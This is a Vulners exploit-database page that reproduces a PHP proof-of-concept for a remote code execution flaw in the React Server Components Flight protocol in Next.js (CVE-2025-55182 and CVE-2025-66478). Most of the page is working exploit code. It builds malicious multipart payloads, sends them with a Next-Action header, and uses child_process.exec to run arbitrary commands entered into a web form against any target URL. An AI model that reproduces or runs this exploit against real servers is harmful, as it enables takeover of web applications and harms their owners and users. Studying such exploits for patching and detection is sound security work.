Vulners
Lucene search
📄 Next.js 15 Remote Code Execution
| Reporter | Title | Published | Views | Family All 487 |
|---|---|---|---|---|
 | Exploit for Deserialization of Untrusted Data in Facebook React | 31 Dec 202514:20 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Facebook React | 9 Dec 202506:46 | – | githubexploit |
| Exploit for CVE-2025-66478 | 11 Dec 202501:49 | – | githubexploit |
| Exploit for CVE-2025-55182 | 4 Dec 202501:26 | – | githubexploit |
| Exploit for CVE-2025-55182 | 5 Dec 202517:47 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Facebook React | 7 Jan 202620:51 | – | githubexploit |
| Exploit for CVE-2025-66478 | 30 May 202600:26 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Facebook React | 15 Dec 202514:56 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Facebook React | 6 Dec 202517:32 | – | githubexploit |
| Exploit for CVE-2025-55182 | 5 Dec 202508:40 | – | githubexploit |
10
=============================================================================================================================================
| # Title : Next.js 15 RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://nextjs.org/blog/next-15 |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212599/ & CVE-2025-55182, CVE-2025-66478
[+] Summary : A PHP-based proof-of-concept implementation demonstrating the critical Remote Code Execution vulnerability in React Server Components (RSC) Flight protocol, affecting React and Next.js applications
[+] POC : http://127.0.0.1/poc.php
<?php
class ReactRCEExploit {
private $targetUrl;
private $userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
public function __construct($targetUrl) {
$this->targetUrl = rtrim($targetUrl, '/');
}
/**
* بناء جزء Multipart خبيث
*/
private function buildMaliciousChunk($refIdx, $reason, $getToken, $nodePayload) {
$data = [
'then' => "\${$refIdx}:then",
'status' => 'resolved_model',
'reason' => $reason,
'value' => json_encode(['then' => '$B']),
'_response' => [
'_prefix' => $nodePayload,
'_formData' => [
'get' => "\${$refIdx}:{$getToken}:constructor"
]
]
];
return json_encode($data);
}
/**
* الحصول على قيمة عشوائية
*/
private function getRandomValue() {
$values = ['""', '{}', '[]', 'null', 'undefined', 'true', 'false'];
$randomString = bin2hex(random_bytes(8));
$values[] = "\"{$randomString}\"";
return $values[array_rand($values)];
}
/**
* بناء بيانات POST
*/
private function buildPostData($nodePayload) {
$randomReason = -rand(1, 9);
$randomRefIdx = rand(0, 9);
$getTokens = ['then', 'constructor'];
$randomGetToken = $getTokens[array_rand($getTokens)];
// بناء الجزء الخبيث
$chunk = $this->buildMaliciousChunk(
$randomRefIdx,
$randomReason,
$randomGetToken,
$nodePayload
);
// بناء بيانات multipart
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));
$data = "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"0\"\r\n\r\n";
$data .= $chunk . "\r\n";
$cycleLength = rand($randomRefIdx, 9);
for ($i = 1; $i <= $cycleLength; $i++) {
$value = ($i == $randomRefIdx) ? "\"\$@{$randomRefIdx}\"" : $this->getRandomValue();
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"{$i}\"\r\n\r\n";
$data .= $value . "\r\n";
}
$data .= "--{$boundary}--\r\n";
return [
'data' => $data,
'boundary' => $boundary
];
}
/**
* إرسال الحمولة
*/
public function sendPayload($nodePayload) {
$postData = $this->buildPostData($nodePayload);
$headers = [
'Next-Action: ',
'Content-Type: multipart/form-data; boundary=' . $postData['boundary'],
'User-Agent: ' . $this->userAgent
];
$context = stream_context_create([
'http' => [
'method' => 'POST',
'header' => implode("\r\n", $headers),
'content' => $postData['data'],
'ignore_errors' => true
]
]);
$response = @file_get_contents($this->targetUrl, false, $context);
if ($response === false) {
return [
'success' => false,
'error' => 'Failed to connect to target'
];
}
// استخراج معلومات الاستجابة
$httpResponse = $http_response_header;
$statusCode = $this->extractStatusCode($httpResponse);
return [
'success' => true,
'status' => $statusCode,
'headers' => $httpResponse,
'body' => $response
];
}
/**
* استخراج كود الحالة من الاستجابة
*/
private function extractStatusCode($headers) {
foreach ($headers as $header) {
if (preg_match('/HTTP\/\d\.\d\s+(\d+)/', $header, $matches)) {
return (int)$matches[1];
}
}
return 0;
}
/**
* التحقق من وجود الثغرة
*/
public function checkVulnerability() {
$randomId = bin2hex(random_bytes(8));
$nodePayload = "throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/{$randomId};307;`});";
$response = $this->sendPayload($nodePayload);
if (!$response['success']) {
return "Failed to connect to target";
}
if ($response['status'] == 303) {
$headersText = implode("\n", $response['headers']);
if (strpos($headersText, "/{$randomId};push") !== false) {
return "Vulnerable! The target appears to be exploitable.";
}
}
return "The target does not appear to be vulnerable.";
}
/**
* تنفيذ الأمر
*/
public function executeCommand($command) {
// تأمين الأمر (هذا مثال فقط، في الواقع يحتاج إلى مزيد من التحصين)
$escapedCommand = escapeshellcmd($command);
$nodePayload = "process.mainModule.require('child_process').exec(\"{$escapedCommand}\",{detached:true,stdio:'ignore'},function(){});";
return $this->sendPayload($nodePayload);
}
}
// مثال على الاستخدام
if (isset($_GET['test'])) {
header('Content-Type: text/plain; charset=utf-8');
$target = isset($_GET['target']) ? $_GET['target'] : 'http://localhost:3000';
$exploit = new ReactRCEExploit($target);
if (isset($_GET['cmd'])) {
// تنفيذ الأمر (لأغراض الاختبار فقط)
$result = $exploit->executeCommand($_GET['cmd']);
echo "Command Execution Result:\n";
print_r($result);
} else {
// التحقق من الثغرة
echo "Checking vulnerability...\n";
echo $exploit->checkVulnerability();
}
exit;
}
?>
<!DOCTYPE html>
<html>
<head>
<title>React RCE Test Tool</title>
<meta charset="utf-8">
</head>
<body>
<h1>React RCE Vulnerability Test</h1>
<p><strong>Warning:</strong> For authorized security testing only!</p>
<form method="GET">
<input type="hidden" name="test" value="1">
<label for="target">Target URL:</label><br>
<input type="text" id="target" name="target"
value="http://localhost:3000" size="50"><br><br>
<label for="cmd">Command to execute (optional):</label><br>
<input type="text" id="cmd" name="cmd"
placeholder="id" size="50"><br><br>
<input type="submit" value="Test Vulnerability">
</form>
<h2>Usage Examples:</h2>
<ul>
<li>Just check: <code>?test=1&target=http://example.com</code></li>
<li>Test with command: <code>?test=1&target=http://example.com&cmd=whoami</code></li>
</ul>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Feb 2026 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.110
EPSS0.84489
SSVC